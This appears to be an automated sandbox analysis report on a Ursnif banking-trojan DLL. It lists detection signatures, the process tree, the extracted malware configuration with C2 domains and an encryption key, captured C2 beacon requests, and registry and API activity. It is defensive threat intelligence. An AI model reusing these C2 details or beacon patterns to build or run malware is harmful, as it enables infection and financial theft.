
Windows Analysis Report 9091.dll

Overview

General Information

Sample Name: 9091.dll
Analysis ID: 548724
MD5: 8cef4bb6ea32fc461e3a954500413512
SHA1: d0612a06f724ebdb72db009010207c929aac9007
SHA256: 6a455667f74c818d5e20a83af8ba5eb8022b1714ceb9302c2b7f7f4ea1a141c9
Tags: dll, exe, Zloader

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Writes or reads registry keys via WMI
Found API chain indicative of debugger detection
Machine Learning detection for sample
Found evasive API chain (may stop execution after checking system information)
Sigma detected: Suspicious Call by Ordinal
Writes registry values via WMI
Uses 32bit PE files
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
PE file contains an invalid checksum
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Registers a DLL
PE / OLE file has an invalid certificate
Creates a process in suspended mode (likely to inject code)

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 4908 cmdline: loaddll32.exe "C:\Users\user\Desktop\9091.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 1364 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\9091.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 5032 cmdline: rundll32.exe "C:\Users\user\Desktop\9091.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • regsvr32.exe (PID: 2332 cmdline: regsvr32.exe /s C:\Users\user\Desktop\9091.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
    • rundll32.exe (PID: 6008 cmdline: rundll32.exe C:\Users\user\Desktop\9091.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "aScpE7CilQ9VtygBXbwXm3cD296yz+RssVO+4h8dSJN8SwshLOZQ8SH7VEx70uuWiFjdqr+uklWJF/baQZUtCK4Bm7884qZ6qhDkBdiQK8V2zH0dHiFpHhB//0WN950qgmnuJAQbYHO78/vC+UGIVbVNILi+zFGHaDdiP/Ka/IdBmgobFFhN6+VD656EnLLJ", "c2_domain": ["google.mail.com", "firsone1.online", "kdsjdsadas.online"], "botnet": "9091", "server": "12", "serpent_key": "01026655AALLKENM", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000004.00000002.798277282.0000000004E58000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000003.00000003.448462123.0000000005008000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000005.00000003.433214839.0000000004D78000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000004.00000002.797837616.00000000047E9000.00000004.00000040.sdmp | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
00000004.00000003.438242726.0000000004E58000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
(first 5 of the 47 entries shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
0.2.loaddll32.exe.990000.0.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
5.2.rundll32.exe.10000000.3.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
4.2.rundll32.exe.4400000.0.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
4.2.rundll32.exe.10000000.3.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
5.2.rundll32.exe.ba0000.0.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
(first 5 of the 19 entries shown)

Sigma Overview

System Summary:

Sigma detected: Suspicious Call by Ordinal
Source: Process started, Author: Florian Roth, Data: Command: rundll32.exe "C:\Users\user\Desktop\9091.dll",#1, CommandLine: rundll32.exe "C:\Users\user\Desktop\9091.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\9091.dll",#1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1364, ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\9091.dll",#1, ProcessId: 5032

Jbx Signature Overview


AV Detection:

Found malware configuration
Source: 00000000.00000002.795901018.0000000000990000.00000040.00000001.sdmp, Malware Configuration Extractor: Ursnif {"RSA Public Key": "aScpE7CilQ9VtygBXbwXm3cD296yz+RssVO+4h8dSJN8SwshLOZQ8SH7VEx70uuWiFjdqr+uklWJF/baQZUtCK4Bm7884qZ6qhDkBdiQK8V2zH0dHiFpHhB//0WN950qgmnuJAQbYHO78/vC+UGIVbVNILi+zFGHaDdiP/Ka/IdBmgobFFhN6+VD656EnLLJ", "c2_domain": ["google.mail.com", "firsone1.online", "kdsjdsadas.online"], "botnet": "9091", "server": "12", "serpent_key": "01026655AALLKENM", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}
Multi AV Scanner detection for submitted file
Source: 9091.dll, Virustotal: Detection: 22%
Source: 9091.dll, ReversingLabs: Detection: 30%
Machine Learning detection for sample
Source: 9091.dll, Joe Sandbox ML: detected
Source: 3.2.regsvr32.exe.10000000.3.unpack, Avira: Label: TR/Crypt.XPACK.Gen8
Source: 5.2.rundll32.exe.10000000.3.unpack, Avira: Label: TR/Crypt.XPACK.Gen8
Source: 4.2.rundll32.exe.10000000.3.unpack, Avira: Label: TR/Crypt.XPACK.Gen8
Source: 0.2.loaddll32.exe.10000000.3.unpack, Avira: Label: TR/Crypt.XPACK.Gen8
Source: 9091.dll, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: unknown, HTTPS traffic detected: 134.0.117.195:443 -> 192.168.2.3:49803 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 134.0.117.195:443 -> 192.168.2.3:49811 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 134.0.117.195:443 -> 192.168.2.3:49812 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 134.0.117.195:443 -> 192.168.2.3:49813 version: TLS 1.2

Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe, Network Connect: 134.0.117.195 187
Source: C:\Windows\SysWOW64\regsvr32.exe, Domain query: google.mail.com
Source: C:\Windows\SysWOW64\regsvr32.exe, Domain query: firsone1.online
Source: C:\Windows\SysWOW64\regsvr32.exe, Domain query: kdsjdsadas.online
Source: Joe Sandbox View, ASN Name: AS-REGRU AS-REGRU
Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic, HTTP traffic detected:
    GET /jkloll/gfrPkOjYD/LcWirUQZbFxpai_2Bx8v/N7vD_2B_2FH5uEzDoVv/7dpgwOBiuXHqM667wEqs_2/BsKhITLbECD_2/BrsCuZOH/9inDS3N_2BAw6xzSFVI4I3r/K9MZrdcrj9/apJueAkO6z3aFPMvl/1u8BPeULfl0I/HXQ5umECQED/KqvCLcJ4CKU902/Ue_2BCWirDHmDgB_2FqvO/givATx4gqqgglwS7/v4BEhQLSTM_2B/_2Fe_2Bu.mki HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
    Host: firsone1.online
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic, HTTP traffic detected:
    GET /jkloll/5uYUQ_2FQN86iHNY49L/DPZD3ITzlDFx_2FKNcjDOh/yQZWvL_2BsZuR/HjaAog4G/r_2B0Neng3bSSbmoFIlXYWw/KZfLo5Aq9a/AVLYw7N9qXQVRr8XS/UyotZ_2BKl95/LDReSgxNZCB/ot3ANBI_2Bmf2Z/wTO_2FRZveJAMYt1OAKW1/qd_2B_2BejnLQISw/xnKbO7DZ_2BFAtS/sbOL_2FiP79J/M.mki HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
    Host: firsone1.online
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic, HTTP traffic detected:
    GET /jkloll/hyS7uNj0vVvG2CRrLbZZ4/bEGaiUTSXLmYtAhM/9KrJzj3TRaRiQeM/Wjbl2GC0W3yiu55m7X/keTVHZUts/0VdexVHBIDjPgfNBu0uT/PguFQeLj5VBY4GnMnUK/UA0cB1h_2F_2BMAAiPyhOY/5Iw7z41oIrnZb/4nW_2Ff2/TobIBfFnKF4Ggs861byzcAY/C9cxP76_2B/WGhxpkLq_2Fup2HWB/_2BU22RdSz/9MAm9.mki HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
    Host: firsone1.online
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic, HTTP traffic detected:
    GET /jkloll/M6Ph7XVMuIVnQJ918dgP/iGy5ZNMffw4qd2BD6Nw/xbvKMlzJtC6XNowbd_2FKm/UnXnZNKrDT7Gw/3YWrqGQ_/2BiRpEYdm3L3qPwkGvjzy_2/FMNOIyI3KK/TIH3Ipp58a4osBqNi/vURpkVVskEDy/A_2BcLgra2r/_2BirjcwqYwgZh/tXOQJ7uW2wVdt9rR3elhH/xJqL8can/GFbQ.mki HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
    Host: firsone1.online
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: unknown, Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49811
Source: global traffic, HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Thu, 06 Jan 2022 10:52:39 GMT
    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
    Content-Length: 460
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
Source: global traffic, HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Thu, 06 Jan 2022 10:52:41 GMT
    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
    Content-Length: 437
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
Source: global traffic, HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Thu, 06 Jan 2022 10:52:42 GMT
    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
    Content-Length: 449
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
Source: global traffic, HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Thu, 06 Jan 2022 10:52:46 GMT
    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
    Content-Length: 424
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
Source: loaddll32.exe, 00000000.00000003.484041107.0000000000AC5000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000002.796286171.0000000000AC5000.00000004.00000020.sdmp, String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: 9091.dll, String found in binary or memory: http://www.symantec.com
Source: loaddll32.exe, 00000000.00000003.484055973.0000000000ADA000.00000004.00000001.sdmp, String found in binary or memory: https://firsone1.online/jkloll/hyS7uNj0vVvG2CRrLbZZ4/bEGaiUTSXLmYtAhM/9KrJzj3TRaRiQeM/Wjbl2GC0W3yiu5
Source: loaddll32.exe, 00000000.00000002.796286171.0000000000AC5000.00000004.00000020.sdmp, String found in binary or memory: https://google.mail.com/jkloll/SrOhqn0MT2IAkG_2B4u/QUT97q1sQV0r5x6X8tk4tl/QK7oXiqO2sMkr/Uet1eMX4/DBd
Source: loaddll32.exe, 00000000.00000002.796286171.0000000000AC5000.00000004.00000020.sdmp, String found in binary or memory: https://kdsjdsadas.online/
Source: loaddll32.exe, 00000000.00000002.796286171.0000000000AC5000.00000004.00000020.sdmp, String found in binary or memory: https://kdsjdsadas.online/jkloll/n1yCX1bWO/IyJVfm7yH8jH38Bki7vn/f4C45hYEgppc8I7zVra/TaacUzdsuPU7_2Bk
Source: unknown, DNS traffic detected: queries for: google.mail.com
Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_00D45988 ResetEvent,ResetEvent,lstrcat,InternetReadFile,GetLastError,ResetEvent,InternetReadFile,GetLastError,0_2_00D45988

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

E-Banking Fraud:

Yara detected Ursnif
                      Source: Yara matchFile source: 00000005.00000002.796340255.0000000000BA0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.798181911.00000000046D9000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.797710008.0000000004400000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.798351348.0000000010000000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.798497438.0000000010000000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.798052757.0000000004A99000.00000004.00000040.sdmp, type: MEMORY

                      System Summary:

                      Writes or reads registry keys via WMI
                      Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                      Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                      Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Writes registry values via WMI
                      Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: 9091.dll | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_100021B4 | 0_2_100021B4
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00D4AFC0 | 0_2_00D4AFC0
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00D47FBE | 0_2_00D47FBE
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00D4836E | 0_2_00D4836E
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00910B68 | 0_2_00910B68
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00910B6A | 0_2_00910B6A
                      Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_02BD7FBE | 3_2_02BD7FBE
                      Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_02BDAFC0 | 3_2_02BDAFC0
                      Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_02BD836E | 3_2_02BD836E
                      Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_00A40B68 | 3_2_00A40B68
                      Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_00A40B6A | 3_2_00A40B6A
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_04A47FBE | 4_2_04A47FBE
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_04A4AFC0 | 4_2_04A4AFC0
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_04A4836E | 4_2_04A4836E
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_00BD0B68 | 4_2_00BD0B68
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_00BD0B6A | 4_2_00BD0B6A
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_0428836E | 5_2_0428836E
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_04287FBE | 5_2_04287FBE
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_0428AFC0 | 5_2_0428AFC0
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_00B70B6A | 5_2_00B70B6A
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_00B70B68 | 5_2_00B70B68
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_1000129A NtMapViewOfSection | 0_2_1000129A
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_1000119D GetProcAddress,NtCreateSection,memset | 0_2_1000119D
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_10001540 SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,GetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError | 0_2_10001540
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_100023D5 NtQueryVirtualMemory | 0_2_100023D5
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00D49A0F NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose | 0_2_00D49A0F
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00D4B1E5 NtQueryVirtualMemory | 0_2_00D4B1E5
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00910541 NtAllocateVirtualMemory | 0_2_00910541
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00910779 NtProtectVirtualMemory | 0_2_00910779
                      Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_02BD9A0F NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose | 3_2_02BD9A0F
                      Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_02BDB1E5 NtQueryVirtualMemory | 3_2_02BDB1E5
                      Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_00A40779 NtProtectVirtualMemory | 3_2_00A40779
                      Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_00A40541 NtAllocateVirtualMemory | 3_2_00A40541
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_04A49A0F NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose | 4_2_04A49A0F
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_04A4B1E5 NtQueryVirtualMemory | 4_2_04A4B1E5
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_00BD0779 NtProtectVirtualMemory | 4_2_00BD0779
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_00BD0541 NtAllocateVirtualMemory | 4_2_00BD0541
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_04289A0F NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose | 5_2_04289A0F
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_0428B1E5 NtQueryVirtualMemory | 5_2_0428B1E5
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_00B70779 NtProtectVirtualMemory | 5_2_00B70779
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_00B70541 NtAllocateVirtualMemory | 5_2_00B70541
                      Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: sfc.dll
                      Source: 9091.dll | Static PE information: invalid certificate
                      Source: 9091.dll | Virustotal: Detection: 22%
                      Source: 9091.dll | ReversingLabs: Detection: 30%
                      Source: 9091.dll | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\9091.dll"
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\9091.dll",#1
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\9091.dll
                      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\9091.dll",#1
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\9091.dll,DllRegisterServer
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\9091.dll",#1
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\9091.dll
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\9091.dll,DllRegisterServer
                      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\9091.dll",#1
                      Source: C:\Windows\System32\loaddll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
                      Source: classification engine | Classification label: mal100.troj.evad.winDLL@9/0@16/1
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00D48F1B CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle | 0_2_00D48F1B
                      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\9091.dll",#1
                      Source: C:\Windows\System32\loaddll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\System32\loaddll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\regsvr32.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\regsvr32.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_100021A3 push ecx; ret | 0_2_100021B3
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_10002150 push ecx; ret | 0_2_10002159
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00D4AC00 push ecx; ret | 0_2_00D4AC09
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00D4D00C push 00000076h; iretd | 0_2_00D4D01A
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00D4E62F push edi; retf | 0_2_00D4E630
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00D4E9AC push 0B565A71h; ret | 0_2_00D4E9B1
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00D4AFAF push ecx; ret | 0_2_00D4AFBF
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00910384 push dword ptr [ebp-00000284h]; ret | 0_2_00910540
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_009108B2 push dword ptr [esp+0Ch]; ret | 0_2_009108C6
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_009108B2 push dword ptr [esp+10h]; ret | 0_2_0091090C
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_009103B6 push dword ptr [ebp-00000284h]; ret | 0_2_00910425
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00910725 push edx; ret | 0_2_009107C7
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00910725 push dword ptr [esp+10h]; ret | 0_2_009108B1
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00910541 push dword ptr [ebp-00000284h]; ret | 0_2_00910577
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00910779 push edx; ret | 0_2_009107C7
                      Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_02BDE62F push edi; retf | 3_2_02BDE630
                      Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_02BDD00C push 00000076h; iretd | 3_2_02BDD01A
                      Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_02BDAC00 push ecx; ret | 3_2_02BDAC09
                      Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_02BDE9AC push 0B565A71h; ret | 3_2_02BDE9B1
                      Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_02BDAFAF push ecx; ret | 3_2_02BDAFBF
                      Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_00A408B2 push dword ptr [esp+0Ch]; ret | 3_2_00A408C6
                      Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_00A408B2 push dword ptr [esp+10h]; ret | 3_2_00A4090C
                      Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_00A403B6 push dword ptr [ebp-00000284h]; ret | 3_2_00A40425
                      Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_00A40384 push dword ptr [ebp-00000284h]; ret | 3_2_00A40540
                      Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_00A40725 push edx; ret | 3_2_00A407C7
                      Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_00A40725 push dword ptr [esp+10h]; ret | 3_2_00A408B1
                      Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_00A40779 push edx; ret | 3_2_00A407C7
                      Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_00A40541 push dword ptr [ebp-00000284h]; ret | 3_2_00A40577
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_04A4E62F push edi; retf | 4_2_04A4E630
